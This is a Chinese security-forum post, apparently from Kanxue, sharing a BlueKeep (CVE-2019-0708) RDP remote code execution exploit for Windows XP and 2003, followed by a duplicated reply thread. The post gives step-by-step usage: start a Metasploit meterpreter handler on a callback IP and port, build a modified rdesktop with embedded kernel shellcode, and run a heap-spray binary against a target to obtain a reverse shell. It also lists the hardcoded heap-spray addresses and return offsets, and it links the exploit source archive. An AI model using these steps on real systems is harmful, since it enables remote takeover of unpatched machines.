[原创]cve-2019-0708_bluekeep_xp_rce-二进制漏洞-看雪论坛-安全社区|非营利性质技术交流社区

[原创]cve-2019-0708_bluekeep_xp_rce

发表于: 2019-9-29 17:42 9073

[原创]cve-2019-0708_bluekeep_xp_rce

coolboyme

2019-9-29 17:42

9073

f07K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6U0L8$3!0D9j5X3!0&6y4r3#2W2i4K6u0r3j5%4k6W2i4K6u0V1x3U0l9I4z5g2)9J5k6o6l9%4x3o6S2Q4y4h3k6T1L8s2g2W2K9$3g2W2M7q4)9#2k6Y4u0U0k6b7`.`.

前后花了3个月通过能够找到的各种开源资料，看雪论坛求助，实现了xp下面的稳定利用。03可以利用自己的机器，不具备通用性。

1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000

2. cd rdesktop-1.5.0 && make

3. 修改config，配置回连ip和端口

192.168.116.133

6000

4. 执行 ./heap_spray 192.168.116.134 (134是xp的地址，内存大于等于2G)

5. msfconsole meterpreter 会得到session

ps:

shellcode/shellcode.asm 是内核shellcode源码，编译以后转成二进制，就是rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b文件了，make的时候会直接编译进程序。

目前仅支持xp，需要xp的内存 >= 2G

如果需要支持2003，需要修改heap_spray.c 里面的 HEAP_SPRAY_ADDRESS 宏地址，经过反复测试，这个地址在03的不同系统版本，不同内存大小是不一样的。但是如果要测试

自己的机器的话，是可以成功在03上利用。不具备通用性。

heap_spray.c

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 //需要自己去windbg调试堆喷shellcode的地址如果有朋友找到通用的解决方案欢迎提交issues

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

测试03

1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000

2. cd rdesktop-1.5.0 && make

3. 修改config，配置回连ip和端口

192.168.116.133

6000

4. 执行 ./_2003_heap_spray 192.168.116.135 (135是03的地址，内存大于等于2G)

5. msfconsole meterpreter 会得到session

1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000

2. cd rdesktop-1.5.0 && make

3. 修改config，配置回连ip和端口

192.168.116.133

6000

4. 执行 ./heap_spray 192.168.116.134 (134是xp的地址，内存大于等于2G)

5. msfconsole meterpreter 会得到session

ps:

shellcode/shellcode.asm 是内核shellcode源码，编译以后转成二进制，就是rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b文件了，make的时候会直接编译进程序。

目前仅支持xp，需要xp的内存 >= 2G

自己的机器的话，是可以成功在03上利用。不具备通用性。

登录后可查看完整内容

[培训]科锐软件逆向54期预科班、正式班开始火爆招生报名啦！！！

最后于 2019-9-30 11:34 被coolboyme编辑，原因：补充使用说明和源码附件

上传的附件：

cve-2019-0708_bluekeep_rce.zip （1.26MB，127次下载）

收藏・4

免费・4

支持

最新回复 (16)
Editor 雪币： 46700 活跃值： (67331) 能力值： (RANK：145 ) 在线值：发帖 2539 回帖 5426 粉丝 2250 关注私信	Editor 2 楼可以把分享内容都贴过来吗？ 2019-9-29 17:44 0
L柳柳雪币： 28 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 15 粉丝 0 关注私信	L柳柳 3 楼牛逼最后于 2019-9-29 17:48 被L柳柳编辑，原因： 2019-9-29 17:47 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 4 楼 Editor 可以把分享内容都贴过来吗？好的，已经贴过来了 2019-9-29 17:55 0
王cb 雪币： 14519 活跃值： (8564) 能力值： ( LV13，RANK：640 ) 在线值：发帖 43 回帖 154 粉丝 185 关注私信	王cb 13 5 楼太强了,学习一下 2019-9-30 10:13 0
xed 雪币： 144 活跃值： (473) 能力值： ( LV3，RANK：20 ) 在线值：发帖 17 回帖 217 粉丝 3 关注私信	xed 6 楼很强。学习了，回头测试一波 2019-10-1 22:14 0
yuchi 雪币： 120 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 9 粉丝 0 关注私信	yuchi 7 楼配图用的是什么工具？ 2019-10-8 21:48 0
houjingyi 雪币： 5640 活跃值： (8711) 能力值： ( LV15，RANK：531 ) 在线值：发帖 31 回帖 107 粉丝 363 关注私信	houjingyi 11 8 楼 2019-10-12 19:16 0
肯特君雪币： 760 活跃值： (69) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 15 粉丝 2 关注私信	肯特君 9 楼 coolboyme 好的，已经贴过来了大佬你好~ 我看了一下源代码，没有看得很明白，使用的是MS_120频道PDU喷堆吗? 我试过这个方式，在2008/win7系统上实现不了 …… 2019-10-13 11:48 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 10 楼肯特君大佬你好~ 我看了一下源代码，没有看得很明白，使用的是MS_120频道PDU喷堆吗? 我试过这个方式，在2008/win7系统上实现不了 …… MS_120 这个channel在2008/win7 确实用不了。 2019-10-14 09:09 0
wx_哄哄_670 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	wx_哄哄_670 11 楼 2003的不通用。系统版本和内存大小也是固定的那几种，那是不是可以设置成通用的呢 2019-10-20 13:47 0
lovetoday 雪币： 2 活跃值： (428) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	lovetoday 12 楼 ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系统 ...网盘下载。。有py版本..rb版本的吗。。 2019-10-25 01:03 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 13 楼 wx_哄哄_670 2003的不通用。系统版本和内存大小也是固定的那几种，那是不是可以设置成通用的呢假设有4种版本，你怎么知道目标版本是哪一个呢？一打过去就蓝屏了。 2019-10-25 15:29 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 14 楼 lovetoday ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系 ... 编译出错是库依赖，简单百度下就能解决了。 2019-10-25 15:30 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 15 楼没有rb版本，不打算合入到 msf 里面 2019-10-25 15:32 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 16 楼 lovetoday ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系 ... 没有rb版本，不打算合入到 msf 里面 2019-10-25 15:32 0
wx_哄哄_670 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	wx_哄哄_670 17 楼 coolboyme 假设有4种版本，你怎么知道目标版本是哪一个呢？一打过去就蓝屏了。自定义4种版本。和meterprete一样自己手动选择啊。最多4次不就成功。 2019-11-2 14:42 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

coolboyme

发帖

112

回帖

335

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (16)
Editor 雪币： 46700 活跃值： (67331) 能力值： (RANK：145 ) 在线值：发帖 2539 回帖 5426 粉丝 2250 关注私信	Editor 2 楼可以把分享内容都贴过来吗？ 2019-9-29 17:44 0
L柳柳雪币： 28 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 15 粉丝 0 关注私信	L柳柳 3 楼牛逼最后于 2019-9-29 17:48 被L柳柳编辑，原因： 2019-9-29 17:47 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 4 楼 Editor 可以把分享内容都贴过来吗？好的，已经贴过来了 2019-9-29 17:55 0
王cb 雪币： 14519 活跃值： (8564) 能力值： ( LV13，RANK：640 ) 在线值：发帖 43 回帖 154 粉丝 185 关注私信	王cb 13 5 楼太强了,学习一下 2019-9-30 10:13 0
xed 雪币： 144 活跃值： (473) 能力值： ( LV3，RANK：20 ) 在线值：发帖 17 回帖 217 粉丝 3 关注私信	xed 6 楼很强。学习了，回头测试一波 2019-10-1 22:14 0
yuchi 雪币： 120 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 9 粉丝 0 关注私信	yuchi 7 楼配图用的是什么工具？ 2019-10-8 21:48 0
houjingyi 雪币： 5640 活跃值： (8711) 能力值： ( LV15，RANK：531 ) 在线值：发帖 31 回帖 107 粉丝 363 关注私信	houjingyi 11 8 楼 2019-10-12 19:16 0
肯特君雪币： 760 活跃值： (69) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 15 粉丝 2 关注私信	肯特君 9 楼 coolboyme 好的，已经贴过来了大佬你好~ 我看了一下源代码，没有看得很明白，使用的是MS_120频道PDU喷堆吗? 我试过这个方式，在2008/win7系统上实现不了 …… 2019-10-13 11:48 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 10 楼肯特君大佬你好~ 我看了一下源代码，没有看得很明白，使用的是MS_120频道PDU喷堆吗? 我试过这个方式，在2008/win7系统上实现不了 …… MS_120 这个channel在2008/win7 确实用不了。 2019-10-14 09:09 0
wx_哄哄_670 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	wx_哄哄_670 11 楼 2003的不通用。系统版本和内存大小也是固定的那几种，那是不是可以设置成通用的呢 2019-10-20 13:47 0
lovetoday 雪币： 2 活跃值： (428) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	lovetoday 12 楼 ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系统 ...网盘下载。。有py版本..rb版本的吗。。 2019-10-25 01:03 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 13 楼 wx_哄哄_670 2003的不通用。系统版本和内存大小也是固定的那几种，那是不是可以设置成通用的呢假设有4种版本，你怎么知道目标版本是哪一个呢？一打过去就蓝屏了。 2019-10-25 15:29 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 14 楼 lovetoday ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系 ... 编译出错是库依赖，简单百度下就能解决了。 2019-10-25 15:30 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 15 楼没有rb版本，不打算合入到 msf 里面 2019-10-25 15:32 0
coolboyme 雪币： 3398 活跃值： (1310) 能力值： ( LV13，RANK：335 ) 在线值：发帖 27 回帖 112 粉丝 32 关注私信	coolboyme 5 16 楼 lovetoday ubunbu 系统 make 编译时出错。。。kali 编译时是出错。。。有windows 编译的吗。。。make 编译时 rdesktop-1.8 成功。。。给个架设好 ubunbu 系 ... 没有rb版本，不打算合入到 msf 里面 2019-10-25 15:32 0
wx_哄哄_670 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	wx_哄哄_670 17 楼 coolboyme 假设有4种版本，你怎么知道目标版本是哪一个呢？一打过去就蓝屏了。自定义4种版本。和meterprete一样自己手动选择啊。最多4次不就成功。 2019-11-2 14:42 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复